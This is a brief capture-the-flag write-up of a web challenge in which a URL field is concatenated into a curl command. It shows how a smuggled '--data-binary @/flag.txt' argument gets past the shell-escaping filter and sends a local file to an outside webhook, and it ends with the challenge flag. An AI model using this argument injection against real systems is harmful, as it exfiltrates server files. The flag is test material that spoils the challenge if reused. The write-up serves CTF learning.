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Category: Web


Author: Mr. Blade

I built a tool to test if websites are alive. Can you test it for me?

Note: the flag is located at /flag.txt



  • The URL input is inserted into the command variable, which contains a Curl command like so command = "curl -s -D - -o /dev/null " + <url> + " | grep -oP '^HTTP.+[0-9]{3}'".
  • The escape_shell_cmd() function validates the URL input to prevent command injection vulnerabilities.
  • Luckily, Curl has a --data-binary option that allows reading file content and appending it to the request. If the value of --data-binary starts with @ followed by a file path, Curl will read the content of that file.
  • By prefixing the URL input with --data-binary @/flag.txt, Curl will include the content of the /flag.txt file in the request.
  • The modified URL would be --data-binary @/flag.txt
  • Curl will read the content of /flag.txt and send it in the request to the specified webhook.
  • This allows us to retrieve the flag content through the webhook.

Flag: gigem{p00r_f1lt3rs_m4k3_f0r_p00r_s3cur1ty}